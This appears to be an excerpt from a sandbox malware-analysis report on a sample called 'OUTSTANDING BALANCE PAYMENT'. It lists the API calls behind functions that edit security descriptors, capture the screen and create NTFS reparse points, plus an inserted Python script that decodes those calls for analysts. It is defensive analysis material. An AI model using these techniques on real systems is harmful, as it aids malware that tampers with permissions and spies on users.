                                                                  • EnumChildWindows.USER32(?,002BCF50), ref: 002BCE90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ChildEnumWindows
                                                                  • String ID: 4+3$CLASS$CLASSNN$H+3$INSTANCE$L+3$NAME$P+3$REGEXPCLASS$T+3$TEXT
                                                                  • API String ID: 3555792229-1830249822
                                                                  • Opcode ID: 4c73a5e7a5665845b320d76ec29e33908793cdbeb8b231ef17c17d2b72acb793
                                                                  • Instruction ID: 1a91e0aa6f37d95b0832643d79324ef49a13803c1cb956f02c4ae43068275b76
                                                                  • Opcode Fuzzy Hash: 4c73a5e7a5665845b320d76ec29e33908793cdbeb8b231ef17c17d2b72acb793
                                                                  • Instruction Fuzzy Hash: 71918234620507DBCB18EF60C482BEAFB75BF04390F64851AD959A7291DF70A979CBE0
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002EE5AB
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002EBEAF), ref: 002EE607
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002EE647
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002EE68C
                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002EE6C3
                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,002EBEAF), ref: 002EE6CF
                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002EE6DF
                                                                  • DestroyIcon.USER32(?,?,?,?,?,002EBEAF), ref: 002EE6EE
                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002EE70B
                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002EE717
                                                                    • Part of subcall function 002A0FA7: __wcsicmp_l.LIBCMT ref: 002A1030
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                  • String ID: .dll$.exe$.icl
                                                                  • API String ID: 1212759294-1154884017
                                                                  • Opcode ID: 1b3342f203f780d58e3745b60a91c3b4f1adb0e4393623ef9cbb2215bf4556bc
                                                                  • Instruction ID: 343bd1bed44781baae9c2e236539a0d0cc923b18fdffe02b8c4c603778b01ba9
                                                                  • Opcode Fuzzy Hash: 1b3342f203f780d58e3745b60a91c3b4f1adb0e4393623ef9cbb2215bf4556bc
                                                                  • Instruction Fuzzy Hash: 7361DF715A0255BBEF24DF65CC86FBE77ACAB18724F504106F911E60D1EBB0A9A0CB60
                                                                  APIs
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • CharLowerBuffW.USER32(?,?), ref: 002CD292
                                                                  • GetDriveTypeW.KERNEL32 ref: 002CD2DF
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002CD327
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002CD35E
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002CD38C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                  • API String ID: 1148790751-4113822522
                                                                  • Opcode ID: 0521414d2715f6fd6244fe3f958259406ecc43f0e7c9bd5334b66f5c6977a750
                                                                  • Instruction ID: c4e3d9ed94734ae26e147b603150f49fad2fbf8cbe608a540f84bb70036d8b41
                                                                  • Opcode Fuzzy Hash: 0521414d2715f6fd6244fe3f958259406ecc43f0e7c9bd5334b66f5c6977a750
                                                                  • Instruction Fuzzy Hash: 02513A75114205AFC701EF20C89196AB7E8FF98718F10896DF88A67291DB31EE19CF52
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,002F3973,00000016,0000138C,00000016,?,00000016,0031DDB4,00000000,?), ref: 002C26F1
                                                                  • LoadStringW.USER32(00000000,?,002F3973,00000016), ref: 002C26FA
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,002F3973,00000016,0000138C,00000016,?,00000016,0031DDB4,00000000,?,00000016), ref: 002C271C
                                                                  • LoadStringW.USER32(00000000,?,002F3973,00000016), ref: 002C271F
                                                                  • __swprintf.LIBCMT ref: 002C276F
                                                                  • __swprintf.LIBCMT ref: 002C2780
                                                                  • _wprintf.LIBCMT ref: 002C2829
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002C2840
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                  • API String ID: 618562835-2268648507
                                                                  • Opcode ID: 92f7d6c5951d9867fe76b07cb3d9bffceee297a65c71d7b0d00b897e8af5f398
                                                                  • Instruction ID: 69795ea083b06848a50de8bcb3e7e82c9e3107e579e0c55d5cdc5ce83d7af309
                                                                  • Opcode Fuzzy Hash: 92f7d6c5951d9867fe76b07cb3d9bffceee297a65c71d7b0d00b897e8af5f398
                                                                  • Instruction Fuzzy Hash: A6415B76811219AACB15FBE0CE86EEEB778AF15344F100169B505B60D2EF346F29CF60
                                                                  APIs
                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002CD0D8
                                                                  • __swprintf.LIBCMT ref: 002CD0FA
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 002CD137
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002CD15C
                                                                  • _memset.LIBCMT ref: 002CD17B
                                                                  • _wcsncpy.LIBCMT ref: 002CD1B7
                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002CD1EC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 002CD1F7
                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 002CD200
                                                                  • CloseHandle.KERNEL32(00000000), ref: 002CD20A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                  • String ID: :$\$\??\%s
                                                                  • API String ID: 2733774712-3457252023
                                                                  • Opcode ID: 1bbec1fd592f89249e6d652586919239c10d5a8143a6f15f6d45268f5ab9f6bc
                                                                  • Instruction ID: 175163012735ae937ae50973bac4277238850b6da3c9b59d047abae420b5b004
                                                                  • Opcode Fuzzy Hash: 1bbec1fd592f89249e6d652586919239c10d5a8143a6f15f6d45268f5ab9f6bc
                                                                  • Instruction Fuzzy Hash: F231B2B651010AABDB21DFA4DC49FEB77BCEF89700F1041BAF909D2161EB7096548B25
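The argument columns in these API listings are raw hex, so the security-relevant detail of the card above has to be decoded by hand: CreateFileW is called with access 40000000 (GENERIC_WRITE), disposition 3 (OPEN_EXISTING) and flags 02200000 (FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT) on a directory the function has just created, and DeviceIoControl is issued with control code 000900A4, which is FSCTL_SET_REPARSE_POINT; together with the `\??\%s` string this is the sequence for writing an NTFS reparse point (junction or symbolic link) onto a fresh directory, with RemoveDirectoryW as the cleanup path. The Python below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses listing lines in the exact format used on this page (including the "Part of subcall function" and parenthesis-free forms) and decodes the CTL_CODE fields and the CreateFileW access, disposition and flag values. The constants are the public Win32/winioctl definitions; the lookup tables deliberately cover only what these cards need and are not exhaustive, so unknown bits are reported as hex rather than named.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Listing lines copied verbatim from the function cards on this page (no live
# report is fetched; they are embedded so the parser runs offline).
SAMPLE_LINES = [
    "• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002CD0D8",
    "• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002CD15C",
    "• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002CD1EC",
    "• GetDriveTypeW.KERNEL32 ref: 002CD2DF",
    "  • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB",
    "• GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 002EF113",
]

# One listing line: optional "Part of subcall function <addr>:" prefix, then
# Name.MODULE, an optional argument list, and the "ref:" code address.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]       # None where the report printed "?"
    ref: int
    subcall_of: Optional[int] = None


def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            # Values are hex as printed; "-00000001" is a negative DWORD (-1).
            args.append(None if tok == "?" else int(tok, 16))
    sub = m.group("sub")
    return ApiCall(m.group("name"), m.group("module"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)


def parse_api_lines(lines) -> List[ApiCall]:
    return [c for c in (parse_line(ln) for ln in lines) if c is not None]


# Public Win32/winioctl constants. These tables are limited to what the cards
# on this page need and are not exhaustive (an assumption of this example).
KNOWN_FSCTL = {0x000900A4: "FSCTL_SET_REPARSE_POINT"}
DEVICE_TYPES = {0x0009: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x40000000: "FILE_FLAG_OVERLAPPED",
              0x80000000: "FILE_FLAG_WRITE_THROUGH"}


def decode_ctl_code(code: int) -> Dict[str, object]:
    """Split a CTL_CODE: DeviceType<<16 | Access<<14 | Function<<2 | Method."""
    device = (code >> 16) & 0xFFFF
    return {
        "device": device,
        "device_name": DEVICE_TYPES.get(device),
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "name": KNOWN_FSCTL.get(code),
    }


def names_for_mask(mask: int, table: Dict[int, str]) -> List[str]:
    """Sorted flag names set in mask; bits absent from the table are kept as hex."""
    names = sorted(n for bit, n in table.items() if mask & bit)
    known = 0
    for bit in table:
        known |= bit
    if mask & ~known:
        names.append("0x%08X" % (mask & ~known))
    return names


def annotate(call: ApiCall) -> Dict[str, object]:
    """Decode the arguments that matter for triage of a single listed call."""
    notes: Dict[str, object] = {}
    if call.name == "DeviceIoControl" and len(call.args) > 1 and call.args[1] is not None:
        notes["ioctl"] = decode_ctl_code(call.args[1])       # arg 1 = dwIoControlCode
    if call.name == "CreateFileW" and len(call.args) >= 6:
        access, disposition, flags = call.args[1], call.args[4], call.args[5]
        if access is not None:
            notes["access"] = names_for_mask(access, GENERIC_ACCESS)
        if disposition is not None:
            notes["disposition"] = DISPOSITIONS.get(disposition)
        if flags is not None:
            notes["flags"] = names_for_mask(flags, FILE_FLAGS)
    return notes


if __name__ == "__main__":
    for call in parse_api_lines(SAMPLE_LINES):
        print("%08X %s.%s %s" % (call.ref, call.name, call.module, annotate(call)))
```

Run as a script it prints one decoded line per listing entry; the DeviceIoControl entry resolves to device 9 (FILE_DEVICE_FILE_SYSTEM), function 41, METHOD_BUFFERED, i.e. FSCTL_SET_REPARSE_POINT. The same parser can be pointed at any other card on this page, since the line grammar is identical throughout the report.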
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002EBEF4,?,?), ref: 002EE754
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002EBEF4,?,?,00000000,?), ref: 002EE76B
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002EBEF4,?,?,00000000,?), ref: 002EE776
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,002EBEF4,?,?,00000000,?), ref: 002EE783
                                                                  • GlobalLock.KERNEL32(00000000), ref: 002EE78C
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002EBEF4,?,?,00000000,?), ref: 002EE79B
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 002EE7A4
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,002EBEF4,?,?,00000000,?), ref: 002EE7AB
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002EBEF4,?,?,00000000,?), ref: 002EE7BC
                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0030D9BC,?), ref: 002EE7D5
                                                                  • GlobalFree.KERNEL32(00000000), ref: 002EE7E5
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 002EE809
                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 002EE834
                                                                  • DeleteObject.GDI32(00000000), ref: 002EE85C
                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002EE872
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                  • String ID:
                                                                  • API String ID: 3840717409-0
                                                                  • Opcode ID: 214716d702baea57fdb36a33aab7f59abc310986df3e9d507b7929003c017ba5
                                                                  • Instruction ID: 51f933d8438b5e5fbaeb270a3a8d8ba76b4685bd737cd6bc50a2186444d2c1b9
                                                                  • Opcode Fuzzy Hash: 214716d702baea57fdb36a33aab7f59abc310986df3e9d507b7929003c017ba5
                                                                  • Instruction Fuzzy Hash: 25414975601205EFDB129FA6DC98EAABBFCEF89711F108459F90AD7260DB319D40CB20
                                                                  APIs
                                                                  • __wsplitpath.LIBCMT ref: 002D076F
                                                                  • _wcscat.LIBCMT ref: 002D0787
                                                                  • _wcscat.LIBCMT ref: 002D0799
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002D07AE
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D07C2
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 002D07DA
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 002D07F4
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 002D0806
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                  • String ID: *.*
                                                                  • API String ID: 34673085-438819550
                                                                  • Opcode ID: 33472c4f4e3c4aae0855a6e5baa307c6fe9c42887a2fba6d8f9a1030893a8c39
                                                                  • Instruction ID: 0e20806346fdca4b16fded7d7b365cd2813a170ba38684751dfeb760c249c9ab
                                                                  • Opcode Fuzzy Hash: 33472c4f4e3c4aae0855a6e5baa307c6fe9c42887a2fba6d8f9a1030893a8c39
                                                                  • Instruction Fuzzy Hash: 1E8171715243419FCB24EF64C885A6EB7E8AB88314F14882FF885D7361EA74DD648F92
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002EEF3B
                                                                  • GetFocus.USER32 ref: 002EEF4B
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 002EEF56
                                                                  • _memset.LIBCMT ref: 002EF081
                                                                  • GetMenuItemInfoW.USER32 ref: 002EF0AC
                                                                  • GetMenuItemCount.USER32(00000000), ref: 002EF0CC
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 002EF0DF
                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 002EF113
                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 002EF15B
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002EF193
                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002EF1C8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1296962147-4108050209
                                                                  • Opcode ID: f543b9393b322aa37f504c62f70a217f05fb05509424b7dfd7f268643e78f3a6
                                                                  • Instruction ID: 0701593b9fdda449fa4ab9d53f87ee1572b5a2817246cbf077fb5427cedb5428
                                                                  • Opcode Fuzzy Hash: f543b9393b322aa37f504c62f70a217f05fb05509424b7dfd7f268643e78f3a6
                                                                  • Instruction Fuzzy Hash: 0181D070268346EFDB11CF16C984A6BBBE8FB88314F41052EF9889B291D770D811CF52
                                                                  APIs
                                                                    • Part of subcall function 002BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 002BABD7
                                                                    • Part of subcall function 002BABBB: GetLastError.KERNEL32(?,002BA69F,?,?,?), ref: 002BABE1
                                                                    • Part of subcall function 002BABBB: GetProcessHeap.KERNEL32(00000008,?,?,002BA69F,?,?,?), ref: 002BABF0
                                                                    • Part of subcall function 002BABBB: HeapAlloc.KERNEL32(00000000,?,002BA69F,?,?,?), ref: 002BABF7
                                                                    • Part of subcall function 002BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 002BAC0E
                                                                    • Part of subcall function 002BAC56: GetProcessHeap.KERNEL32(00000008,002BA6B5,00000000,00000000,?,002BA6B5,?), ref: 002BAC62
                                                                    • Part of subcall function 002BAC56: HeapAlloc.KERNEL32(00000000,?,002BA6B5,?), ref: 002BAC69
                                                                    • Part of subcall function 002BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002BA6B5,?), ref: 002BAC7A
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002BA8CB
                                                                  • _memset.LIBCMT ref: 002BA8E0
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002BA8FF
                                                                  • GetLengthSid.ADVAPI32(?), ref: 002BA910
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 002BA94D
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002BA969
                                                                  • GetLengthSid.ADVAPI32(?), ref: 002BA986
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002BA995
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 002BA99C
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002BA9BD
                                                                  • CopySid.ADVAPI32(00000000), ref: 002BA9C4
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002BA9F5
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002BAA1B
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002BAA2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: f6efe1af325dd7f50e548a0f5206578b3defc5be0379d9949e8d8def37fdd85b
                                                                  • Instruction ID: 2359808fd2999cfe11cfe010b9242975ba0d82aa7f09e730a6f6e666d244e4ac
                                                                  • Opcode Fuzzy Hash: f6efe1af325dd7f50e548a0f5206578b3defc5be0379d9949e8d8def37fdd85b
                                                                  • Instruction Fuzzy Hash: 4E518DB191020AAFDF15CFA0DD95EEEBBB9FF04340F04812AF815A7290DB309A15CB61
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 002D9E36
                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002D9E42
                                                                  • CreateCompatibleDC.GDI32(?), ref: 002D9E4E
                                                                  • SelectObject.GDI32(00000000,?), ref: 002D9E5B
                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 002D9EAF
                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 002D9EEB
                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 002D9F0F
                                                                  • SelectObject.GDI32(00000006,?), ref: 002D9F17
                                                                  • DeleteObject.GDI32(?), ref: 002D9F20
                                                                  • DeleteDC.GDI32(00000006), ref: 002D9F27
                                                                  • ReleaseDC.USER32(00000000,?), ref: 002D9F32
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                  • String ID: (
                                                                  • API String ID: 2598888154-3887548279
